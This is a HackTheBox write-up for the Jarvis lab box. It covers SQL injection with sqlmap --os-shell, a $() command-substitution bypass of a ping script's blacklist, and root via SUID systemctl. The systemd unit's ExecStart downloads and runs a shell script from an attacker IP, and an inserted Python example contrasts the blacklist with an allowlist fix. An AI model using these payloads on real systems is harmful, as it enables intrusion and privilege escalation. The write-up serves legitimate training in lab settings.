Jarvis — HackTheBox Writeup


Jarvis was a simple and fun box. I’ll start off by finding an SQLi in one of the webpages and get a basic shell using sqlmap and then bypass a filter on a sudo file to get to the user flag. To get to the root, I’ll abuse a suid binary to obtain root shell.

Enumeration

As usual, let’s start off with a Nmap scan.

The usual ports 22 and 80, plus 64999, are open. Let's run gobuster in the background to keep enumeration going.

80 — HTTP

We are presented with what looks like a hotel booking website.

We see supersecurehotel.htb mentioned on the page. Maybe there's a virtual host; let's add it to our /etc/hosts file and see if the server responds any differently.

127.0.1.1       kali
10.10.10.143    supersecurehotel.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Well, browsing to supersecurehotel.htb serves the same webpage.

//supersecurehotel.htb/room.php?cod=1  caught my attention. My guess was that the parameter cod is vulnerable to SQLi.

Testing with some basic SQLi confirms that the site is indeed vulnerable. I checked the number of columns with

//supersecurehotel.htb/room.php?cod=1%20UNION%20SELECT%201,2,3,4,5,6,7.

I fed the request to sqlmap and tried to get a basic shell from it.

root@kali:~/htb/boxes/jarvis# sqlmap -r room.req --batch --os-shell

Choose the default option whenever sqlmap asks a question.
... and it worked!

From there we can get a proper shell.

Privesc: www-data -> pepper

We see that the user www-data has sudo permission to run a file as the pepper user.

sudo permission

This looks like some kind of application that lets us ping a host and gives us statistics for it.

Initially I tried simple bash substitution, and it looks like the filter caught me. I took a look at the code to see what kind of filter it has and which commands it allows.

blacklist

So, it's filtering characters that would allow us to execute other commands. I decided to keep poking around with bash substitution, $().

It worked!

If I remove the special characters and just run a single command inside the substitution, it works, and we see that we are running it as the pepper user. Time to get a shell now.
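As an added example (not the box's script or the author's code), here is a constructed character blacklist of the kind described above, next to an allowlist-based replacement that validates the target and never hands user input to a shell. The blacklist contents, function names and the ping argv are assumptions.

```python
import ipaddress
import re
from typing import List, Optional

# Constructed blacklist (assumption): the classic "strip shell metacharacters"
# approach. It rejects ; & | ` > < and backslash, but says nothing about $( ).
BLACKLIST = set(";&|`\n><\\")


def blacklist_allows(target: str) -> bool:
    """Return True if the blacklist would let this input through to the shell."""
    return not any(ch in BLACKLIST for ch in target)


# RFC 1123 style hostname: labels of alphanumerics and hyphens, dot separated.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def validate_target(target: str) -> Optional[str]:
    """Allowlist check: accept only an IP literal or a syntactically valid hostname."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(target):
        return target
    return None


def build_ping_argv(target: str) -> Optional[List[str]]:
    """Build an argv list for subprocess.run(argv) with shell=False.

    Because the target is passed as a single argument and no shell is involved,
    substitution syntax such as $(...) is just literal text, not a command.
    """
    validated = validate_target(target)
    if validated is None:
        return None
    return ["ping", "-c", "4", validated]
```

The first function reproduces the page's finding: `$(id)` contains no blacklisted character and passes, while the allowlist rejects it outright.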

Shell as pepper

Privesc: pepper -> root

Doing some basic checks, we see that the SUID bit is set on systemctl. I looked for ways to privesc with the help of systemctl.

My go-to page was //gtfobins.github.io/gtfobins/systemctl/

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
./systemctl link $TF
./systemctl enable --now $TF

The above script creates a service file with a command in the ExecStart field that runs when the service is started, then links the service and enables it. It is an awesome resource for understanding systemctl services.

I tried the above script, but it didn't work out as expected, so I took a look at writing my own service file. This is what I wrote. It's a very basic service file that executes the command in the ExecStart field when the service is started.

[Unit]
Description=Example systemd service.

[Service]
Type=simple
ExecStart=/bin/bash -c "/usr/bin/wget //10.10.14.174/rootShell.py -O /tmp/kkk.py ;/usr/bin/python /tmp/kkk.py"

[Install]
WantedBy=multi-user.target

Make sure that this service file is not in the /tmp/ folder; I was stuck here for a fair bit of time. Once I moved the service file to /home/pepper/, it worked flawlessly. This is what the docs say:

link FILENAME
Link a unit file that is not in the unit file search paths into the unit file search path. This requires an absolute path to a unit file. The effect of this can be undone with disable. The effect of this command is that a unit file is available for start and other commands although it is not installed directly in the unit search path.

Once the service is linked, just start it as we would any normal service like apache2 or docker.

rooted

Thanks for reading,
Preetham ( //twitter.com/PreethamBomma_)

Jarvis — HackTheBox Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.